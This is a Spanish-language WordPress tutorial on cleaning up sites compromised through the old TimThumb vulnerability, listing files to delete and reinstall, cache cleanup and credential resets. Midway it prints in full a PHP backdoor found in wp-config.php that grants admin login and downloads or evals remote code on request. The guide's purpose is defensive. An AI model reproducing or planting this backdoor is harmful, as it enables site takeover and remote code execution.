Cómo arreglar y limpiar el truco de TimThumb en WordPress

Entonces, si recuerda correctamente, hubo un problema de seguridad con el script TimThumb en agosto que se ha solucionado. Sin embargo, para nuestra sorpresa, muchos sitios todavía usan la versión anterior. Hasta ahora hemos arreglado tres sitios en el último mes, incluido uno ayer. Por lo tanto, tiene sentido simplemente escribir un artículo paso a paso, para que nuestros usuarios puedan simplemente seguirlo. Los tres usuarios para los que resolvimos este problema ni siquiera sabían qué era TimThumb o si lo estaban usando o no.

TimThumb es un script PHP que cambia el tamaño de las imágenes. Había una vulnerabilidad en él, pero ahora es SEGURO de usar.

Entonces, ¿cómo sabe que su sitio ha sido pirateado? Si ve una gran pantalla roja en su navegador cuando visita su sitio:

Si comienza a ser bombardeado con correos electrónicos sobre usuarios que son redirigidos desde su sitio. Lo más probable es que su sitio haya sido víctima de este exploit.

Como medida de precaución, todos deben usar este Escáner de vulnerabilidades de Timthumb. Esto le dirá si está utilizando la versión anterior de TimThumb. Muchos clubes temáticos actualizaron inmediatamente su núcleo. Luego, este plugin verificará si está instalada la nueva versión segura de Timthumb o si está instalada una versión anterior.

[enlazatom_show_links]

Ahora, si su sitio ya ha sido víctima de este exploit de Timthumb, esto es lo que debe hacer.

Primero debe eliminar los siguientes archivos:

/wp-admin/upd.php
/wp-content/upd.php

Inicie sesión en el panel de administración de WordPress y reinstale su versión de WordPress. Estamos tratando específicamente de reinstalar estos archivos:

/wp-settings.php
/wp-includes/js/jquery/jquery.js
/wp-includes/js/110n.js

Luego abra su wp-config.php donde probablemente encontrará este gran código de malware que recopila las credenciales de inicio de sesión y las cookies. Este código estará inactivo.

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE="JavaScript">location.href="https://www.trucoswp.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/$fnm";</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

En su carpeta de temas, busque dónde el script TimThumb podría almacenar archivos en caché. Suelen estar en esta instalación:

/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php

Elimina todo lo que se parezca a esto. Si no está seguro de algo, elimine todo lo que no sea un archivo de imagen.

Lo siguiente que debe hacer es reemplazar timthumb.php con la última versión que se puede encontrar en http://timthumb.googlecode.com/svn/trunk/timthumb.php

Ahora sería una buena idea cambiar sus contraseñas comenzando con su información de inicio de sesión de MySQL a su información de inicio de sesión de WordPress. No olvide cambiar la contraseña de MySQL en wp-config.php o aparecerá la pantalla «Error al crear la conexión».

Cambie las claves secretas en su archivo wp-config.php. Puede generar una nueva clave yendo a generador en línea.

Ya terminaste. No olvide borrar todos los plugins de almacenamiento en caché de páginas. Como medida de precaución, también es bueno borrar la caché y las cookies de su navegador.

Para los desarrolladores, intente utilizar la función Tamaños de imagen adicionales en WordPress para reemplazar las funciones de Timthumb.

Háganos saber si necesita más ayuda mediante nuestro formulario de contacto.

¿Te ha resultado útil??

0 / 0

Deja una respuesta 0

Tu dirección de correo electrónico no será publicado. Required fields are marked *